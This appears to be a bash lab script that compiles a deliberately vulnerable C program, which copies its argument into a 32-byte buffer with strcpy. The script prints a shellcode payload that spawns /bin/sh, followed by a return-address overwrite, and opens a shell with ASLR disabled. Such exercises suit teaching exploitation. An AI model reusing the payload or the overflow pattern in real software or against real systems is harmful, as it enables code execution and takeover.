#!/bin/bash
function main(){
cat << EOF
#include <string.h>
#include <stdio.h>
#include <stdlib.h>

void func(char *arg)
{
    char nombre[32];
    strcpy(nombre, arg);
    printf("\nHola, %s\n\n", nombre);
}
int main(int argc, char *argv[])
{
    if ( argc != 2 ) {
        printf("Uso: %s NOMBRE\n", argv[0]);
        exit(0);
    }
    func(argv[1]);
    printf("Fin del programa\n\n");
    return 0;
}
EOF
}

# compile
main > file.c
cc file.c

# helper
cat << 'EOF'
`perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"."AAAAAAAAAAAAAAAAAAAA"."\x1b\xf3\xff\xbf"'`
copia y pega en ./a.out
EOF

# root
setarch "$(uname -m)" -R bash --rcfile <(echo "PS1='no-aslr $ '") -i